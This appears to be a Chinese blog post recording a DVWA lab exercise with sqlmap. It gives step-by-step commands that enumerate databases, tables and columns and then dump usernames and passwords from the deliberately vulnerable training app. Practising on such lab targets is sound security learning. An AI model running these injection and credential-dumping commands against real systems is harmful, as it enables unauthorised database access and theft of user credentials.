tnblog
首页
视频
资源
登录

Sqlmap实验心得

3903人阅读 2022/11/30 20:59 总访问:37991 评论:0 收藏:0 手机
分类: 实验


Sqlmap自动化注入操作步骤

一、POST方法操作步骤

1、打开DVWA,访问sqlinjection,输入1-6任意数据。提交,复制地址。

2获取cookie

3查询数据库

sqlmap -u " 前面复制的地址" 

--cookie="security=low; PHPSESSID=tqllj4nkcvcgp1s2q0q7kkbfh7" --dbs --batch

 

4查询dvwa下的表

sqlmap-u ""

--cookie="security=low;PHPSESSID=tqllj4nkcvcgp1s2q0q7kkbfh7" --dbs --batch -D dvwa --tables

5查询users下的列

sqlmap -u "" 

--cookie="security=low; PHPSESSID=tqllj4nkcvcgp1s2q0q7kkbfh7" --dbs --batch -D dvwa -T users --columns

 

 

6获得表的数据

查询用户名、密码

sqlmap -u ""

 --cookie="security=low; PHPSESSID=tqllj4nkcvcgp1s2q0q7kkbfh7" --dbs --batch -D dvwa -T users -C user,password,user_id --dump

 

 

 

评价
等风来,乘风归。
排名
6
文章
6
粉丝
16
评论
8
{{item.articleTitle}}
{{item.blogName}} : {{item.content}}
ICP备案 :渝ICP备18016597号-1
网站信息:2018-2024TNBLOG.NET
技术交流:群号656732739
联系我们:contact@tnblog.net
公网安备:50010702506256
欢迎加群交流技术